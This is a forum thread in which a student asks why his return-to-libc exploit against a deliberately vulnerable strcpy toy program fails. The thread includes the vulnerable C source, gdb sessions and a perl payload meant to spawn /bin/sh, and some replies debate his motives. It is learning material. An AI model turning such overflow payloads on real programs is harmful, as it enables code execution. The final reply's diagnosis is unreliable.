Problem with simple return-to-libc exploit.
Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: Problem with simple return-to-libc exploit.

  1. #1
    Junior Member Haggis's Avatar
    Join Date
    Jul 2007
    Posts
    5

    Problem with simple return-to-libc exploit.

    Im experimenting with some basic exploits and need some help.

    Here is the standard issue code - exploit.c :
    Code:
    #include <stdio.h>
    #include <string.h>
    
    int main(int argc, char *argv[])
    {
    
      char buffer[5];
    //buffer[0] = 1;
    //buffer[5] = 0;
    
      strcpy(buffer, argv[1]);
     
     return 0;
    }
    It will be obvious what im trying to do, but ill explain anyway.

    I want to craft a buffer and feed it to ./exploit so that the call to strcpy() will overwrite the stack frame belonging to main, and execution can be redirected to the system() call in libc.

    Here are the steps I have taken.

    I want system() to spawn me a shell so I need to pass it the argument "/bin/sh", which i've stored in an enviroment variable:
    $>export BINSH="/bin/sh"
    And written a simple program to return the address of the variable in memory using the getenv() function :
    $ ./getenv BINSH
    BINSH @ 0xbffffc86
    To find the address of system() ive used used gdb:
    Note that address space randomization has been turned off.
    $ gdb -q exploit
    Using host libthread_db library "/lib/libthread_db.so.1".
    (gdb) run aaaa
    Starting program: ........../exploit aaaa

    Program exited normally.
    (gdb) p system
    $1 = {<text variable, no debug info>} 0xb7ede030 <system>
    (gdb) quit
    To find out how much garbage to put at the start of the buffer I looked at the output from gcc - exploit.s :
    Code:
    .file	"exploit.c"
    	.text
    .globl main
    	.type	main, @function
    main:
    	leal	4(%esp), %ecx
    	andl	$-16, %esp
    	pushl  -4(%ecx)
    	pushl  %ebp
    	movl	%esp, %ebp
    	pushl  %ecx
    	subl	$36, %esp
    	movl	4(%ecx), %eax
    	addl	$4, %eax
    	movl	(%eax), %eax
    	movl	%eax, 4(%esp)
    	leal	-9(%ebp), %eax
    	movl	%eax, (%esp)
    	call	strcpy
    	movl	$0, %eax
    	addl	$36, %esp
    	popl	%ecx
    	popl	%ebp
    	leal	-4(%ecx), %esp
    	ret
    	.size	main, .-main
    	.ident	"GCC: (GNU) 4.1.2 (Gentoo 4.1.2)"
    	.section	.note.GNU-stack,"",@progbits
    It looks as though buffer[0] is located 9 bytes from the saved frame pointer. I execute the exploit code with a crafted buffer as follows:

    $ ./exploit `perl -e 'print "A"x13 . "\x30\xe0\xed\xb7AAAA\x86\xfc\xff\xbf";'`
    Segmentation fault
    ......nothing. No new shell.
    Despite the fact I know that EIP is getting overwritten. According to gdb:

    $ gdb -q exploit
    Using host libthread_db library "/lib/libthread_db.so.1".
    (gdb) disassemble main
    Dump of assembler code for function main:
    0x08048374 <main+0>: lea 0x4(%esp),%ecx
    0x08048378 <main+4>: and $0xfffffff0,%esp
    0x0804837b <main+7>: pushl 0xfffffffc(%ecx)
    0x0804837e <main+10>: push %ebp
    0x0804837f <main+11>: mov %esp,%ebp
    0x08048381 <main+13>: push %ecx
    0x08048382 <main+14>: sub $0x24,%esp
    0x08048385 <main+17>: mov 0x4(%ecx),%eax
    0x08048388 <main+20>: add $0x4,%eax
    0x0804838b <main+23>: mov (%eax),%eax
    0x0804838d <main+25>: mov %eax,0x4(%esp)
    0x08048391 <main+29>: lea 0xfffffff7(%ebp),%eax
    0x08048394 <main+32>: mov %eax,(%esp)
    0x08048397 <main+35>: call 0x80482c0 <strcpy@plt>
    0x0804839c <main+40>: mov $0x0,%eax
    0x080483a1 <main+45>: add $0x24,%esp
    0x080483a4 <main+48>: pop %ecx
    0x080483a5 <main+49>: pop %ebp
    0x080483a6 <main+50>: lea 0xfffffffc(%ecx),%esp
    0x080483a9 <main+53>: ret
    End of assembler dump.
    (gdb) break *0x0804839c
    Breakpoint 1 at 0x804839c
    (gdb) run `perl -e 'print "A"x13 . "\x30\xe0\xed\xb7AAAA\x86\xfc\xff\xbf";'`
    Starting program: ........./exploit `perl -e 'print "A"x13 . "\x30\xe0\xed\xb7AAAA\x86\xfc\xff\xbf";'`

    Breakpoint 1, 0x0804839c in main ()
    (gdb) info frame
    Stack level 0, frame at 0xbffff230:
    eip = 0x804839c in main; saved eip 0xb7ede030
    Arglist at 0xbffff228, args:
    Locals at 0xbffff228, Previous frame's sp is 0xfffffdb9
    Saved registers:
    ecx at 0xbffff224, ebp at 0xbffff228, eip at 0xbffff22c
    (gdb)

    So what am I doing wrong? Have I crafted the stack frame incorrectly? What am I missing?

    Are you still reading?

    Any insight or pointers in the right direction are greatly appreciated.

    Here is some more information about my system that might be useful.

    $ uname -a
    Linux localhost 2.6.20-gentoo-r8 #1 Wed Jul 11 01:17:44 GMT 2007 i686 Mobile AMD Sempron(tm) Processor 3400+ AuthenticAMD GNU/Linux

    $ gcc --version
    gcc (GCC) 4.1.2 (Gentoo 4.1.2)
    [/QUOTE]

  2. #2
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,191
    My dear "Prince of the pudding race" (Rabbie Burns) I have allowed this post, on the grounds that we are a security site.

    Sorry that I am not technically competent to answer your question

    cheers

  3. #3
    Senior Member WolfeTone's Avatar
    Join Date
    Jun 2007
    Location
    Ireland
    Posts
    197
    Before I answer or attempt to, can I ask from what viewpoint you are interested in exploits, to use them to gain system access or understand them to prevent?

  4. #4
    Junior Member Haggis's Avatar
    Join Date
    Jul 2007
    Posts
    5
    Do you care?

    I have no desire to learn, from you or anyone else here, how to break into peoples computers; Nor to understand exploits with a view to preventing them (as I never write code that appears in the public domain). I simply wish to understand these techniques.

    No-one is going to gain root access with this exploit anyway (as system() drops privileges).

    So please dont give me your right-of-passage question-and-answer-session bull***t. If you think i'm some nasty wannabe hacker(or whatever) who is going to try to do lots of nasty stuff, then simply dont post anything. I'll learn the techniques myself eventually, I just wondered if there might be any support out there, or anyone who shared an interest and wanted to engage in some intelligent discussion.

    But please, dont post crap like that

  5. #5
    Senior Member WolfeTone's Avatar
    Join Date
    Jun 2007
    Location
    Ireland
    Posts
    197
    Quote Originally Posted by Haggis
    Do you care?
    Wouldn't of asked if I didnt!

    Quote Originally Posted by Haggis
    But please, dont post crap like that
    No prob, I won't.

  6. #6
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,191
    Do you care?
    Yes, strange though it might seem, we actually do..........

    Believe it or not, we get so many "how do I hack my girlfriend's Hotmail account" or online Viagra adverts and all that crap..............

    I made a personal decision that you were a genuine guy who would contribute to our forums........... please don't prove me wrong, and do lose the chip on your shoulder.

    I have no desire to learn, from you or anyone else here
    Why did you join then?

    If you cannot code, perhaps you should consider a career in selling icecream?

    If you have no intellectual humility perhaps you should go elsewhere?

    Up to you my "prince of the pudding race"

  7. #7
    Senior Member WolfeTone's Avatar
    Join Date
    Jun 2007
    Location
    Ireland
    Posts
    197
    Quote Originally Posted by nihil
    do lose the chip on your shoulder.
    Agreed!
    You'll find people more willing to help then.
    And from what I've seen - there are def people who can!

    If you cannot code, perhaps you should consider a career in selling icecream?
    Ha.

    But I do agree with nihil - you seem to be genuinely interested, so an adjustment in attitude would really help.

  8. #8
    Senior Member WolfeTone's Avatar
    Join Date
    Jun 2007
    Location
    Ireland
    Posts
    197
    I found the link below an interesting read, might help you.

    [Edit] Link removed as I don't like posting in public forums. Check your PM.[/Edit]

    Provided as a gesture of good faith!

  9. #9
    Junior Member Haggis's Avatar
    Join Date
    Jul 2007
    Posts
    5
    I do beg your pardon, I may have been a bit quick off the mark. There was no need to respond like that and I apologize - if not for causing offence, then certainly for bringing down the intelligence of the forum.

    Please do not quote me out of context, i'm sure you're well aware the point I was making - I have no desire to "Hack my Girlfriends Hotmail"(Incidently, we have quite a good relationship, and I am granted free access to her account for my own use ).

    I am genuine. A student from Glasgow, studying a mixture of electronics and computer science. I have been programming for some time and have recently become interested in how programs are exploited, in particular how execution can be controlled and redirected. I have come accross a stumbling block however and required some help understanding. I thought this would be a good thread for people who are in the same position but didnt know who to ask, as I am aware the resources for this type of exploit go out of date quite quickly.

    This is advertised as a "Security" forum with a section in particular, on "Programming Security". I would of thought the bulk of the discussion here would centre upon buffer overflows, format string exploits etc. which doesnt seem to be the case. Hence I have started a thread where hopefully, people with enough intelligence, will be able to follow a very basic (and relatively un-dangerous) exploit from start to finish. To that end then, I invite anyone with the knowledge and desire, to please contribute.

    Thank you for the link WolfeTone. I have not yet looked at it but certainly will!

  10. #10
    Elite Hacker
    Join Date
    Mar 2003
    Posts
    1,407
    You don't have any shellcode or anything. You're just calling system() with no arguments. It needs a command to execute. You need to get the address of a string with the command you want on the stack before you call it. I've never seen anyone do it that way though. I've only seen people put the actual machine code to exec a shell in memory and have it return to that. I'm sure the link provided to you will give you a good understanding. Good luck.

Similar Threads

  1. Slack BSD
    By gore in forum Operating Systems
    Replies: 2
    Last Post: February 25th, 2005, 08:12 AM
  2. return problem
    By valheru in forum Site Feedback/Questions/Suggestions
    Replies: 14
    Last Post: May 3rd, 2002, 11:31 PM
  3. The Worlds Longest Thread!
    By Noble Hamlet in forum AntiOnline's General Chit Chat
    Replies: 1100
    Last Post: March 17th, 2002, 09:38 AM
  4. simple friend Vs Real friend
    By intruder in forum AntiOnline's General Chit Chat
    Replies: 5
    Last Post: February 26th, 2002, 03:48 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •